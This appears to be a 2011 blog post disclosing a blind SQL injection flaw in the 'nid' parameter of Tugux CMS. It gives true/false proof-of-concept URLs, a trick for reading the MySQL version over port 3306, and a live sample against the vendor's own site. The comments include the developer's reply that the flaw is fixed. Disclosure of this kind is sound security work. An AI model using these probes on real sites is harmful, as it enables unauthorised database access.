2011/03/18

Tugux CMS (nid) BLIND sql injection vulnerability

===================================================================
Tugux CMS (nid) BLIND sql injection vulnerability
===================================================================

Software: Tugux CMS
Vendor: www.tugux.com
Vuln Type: BLind SQL Injection
Download link: http://sourceforge.net/projects/tuguxcms/files/tuguxCMS_v.1.0_final.rar/download
Author: eidelweiss
contact: eidelweiss[at]windowslive[dot]com
Home: www.eidelweiss.info


===================================================================

exploit & p0c

[!] latest.php?nid=[valid nid]

Example p0c

[!] http://host/latest.php?nid=9 <= True
[!] http://host/latest.php?nid=-9 <= False

[+] http://host:3306 <= download the file , save and open with c++ or wordpad will show mysql version

[!] sample: http://www.tugux.com:3306 result : 5.0.92-community (use versi 5.0.92) :D


====================================================================

Nothing Impossible In This World Even Nobody`s Perfect

===================================================================

==========================| -=[ E0F ]=- |==========================

3 comments:

  1. HI i am the deveoper of the Tugux CMS.. thanks to tell me about security fix. i fixed the security leak. to prevent TUGUX CMS by SQL injection... once again thanks. if you want to help us improve tugux CMS. you can join our team

    ReplyDelete
  2. My email is yousaf@tugux.com

    ReplyDelete
  3. The post is very nicely written and it contains many useful facts. I am happy to find your distinguished way of writing the post. Now you make it easy for me to understand and implement. Thanks for sharing with us. Content management system

    ReplyDelete